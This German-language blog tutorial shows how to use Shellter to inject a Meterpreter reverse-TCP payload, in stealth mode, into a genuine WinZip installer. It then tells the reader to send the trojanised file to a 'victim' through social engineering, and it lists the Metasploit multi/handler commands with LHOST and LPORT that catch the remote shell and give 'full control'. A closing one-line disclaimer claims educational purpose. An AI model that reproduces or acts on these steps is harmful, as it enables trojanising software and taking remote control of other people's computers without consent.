So fügen Sie mit Shellter bösartigen Code in Exe-Dateien ein

Apr 27 2023
Shellter ist ein dynamisches Shellcode-Injektionstool, mit dem Nutzlasten in eine ausführbare Windows-Datei (EXE) eingefügt werden. Diese Injektion ermöglicht es Ihnen, eine Nutzlast oder einen bösartigen Code in eine echte ausführbare Datei zu verschleiern.

Shellter ist ein dynamisches Shellcode-Injektionstool, mit dem Nutzlasten in eine ausführbare Windows-Datei (EXE) eingefügt werden.

Diese Injektion ermöglicht es Ihnen, eine Nutzlast oder einen bösartigen Code in eine echte ausführbare Datei zu verschleiern. Um diese Technik zu demonstrieren, werde ich eine Reverse-TCP-Meterpreter-Nutzlast in eine EXE-Datei einfügen.

Bei dieser harmlosen Datei kann es sich um eine beliebige EXE-Datei handeln, beispielsweise um die Datei „CCleaner.exe“ oder „WinZip.exe“. Wie Sie sich vorstellen können, ist es ohne große Schwierigkeiten möglich, das System der Person zu kompromittieren, wenn Sie eine Methode finden, diese schädliche Datei an eine Person zu übermitteln.

Installieren Sie Shellter

Sie können Shellter mit dem folgenden Befehl installieren:

apt install shellter

Führen Sie Shellter aus

Shellter kann mit dem folgenden Terminalbefehl ausgeführt werden:

shellter

Nachdem ich nun alles bereit habe, kann ich eine Nutzlast in das WinZip-Installationsprogramm einfügen.

Das Tool ermöglicht die Wahl zwischen dem automatischen und manuellen Betriebsmodus. Ich werde mit der Auto-Methode fortfahren.

Shellter fragt dann nach dem PE-Ziel oder dem Pfad zur ausführbaren Datei. In meinem Fall verweise ich das Tool auf die ausführbare Datei, die ich heruntergeladen habe (winzip23-downwz.exe).

Anschließend werden Sie aufgefordert, den Stealth-Modus zu aktivieren. Geben Sie „Y“ für „Ja“ ein.

Anschließend werden Sie aufgefordert, die Nutzlast auszuwählen. In meinem Fall habe ich 1 für Meterpreter_Reverse_TCP ausgewählt.

Anschließend werden Sie aufgefordert, LHOST und LPORT festzulegen. Geben Sie die lokale Host-IP und den lokalen Port ein. Sie können den Befehl ifconfig verwenden, um Ihre IP-Adresse zu ermitteln.

Nach Eingabe der Adresse und des Ports beginnt die Anwendung schließlich mit der Infektion des Installationsprogramms.

Senden Sie die Datei „WinZip.exe“ an den Computer des Opfers

An diesem Punkt müssen Sie nur noch Ihre Social-Engineering-Fähigkeiten einsetzen und die Datei „winzip23-downwz.exe“ an das Opfer senden. Stellen wir also den Listener so ein, dass er eine Sitzung aufzeichnet, wenn das Opfer die Datei ausführt.

Geben Sie in einem neuen Terminal msfconsole ein, um das Metasploit-Framework zu starten, und führen Sie die folgenden Befehle aus:

msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17 
msf5> set LPORT 8080
msf5> run

Von hier aus haben Sie die vollständige Kontrolle über die Zielmaschine.

Hinweis: Bitte beachten Sie, dass alle Informationen zur Erweiterung des Wissens und nicht zur Veranlassung böswilliger oder schädlicher Angriffe verwendet werden.

Vielen Dank, dass Sie diesen Artikel gelesen haben!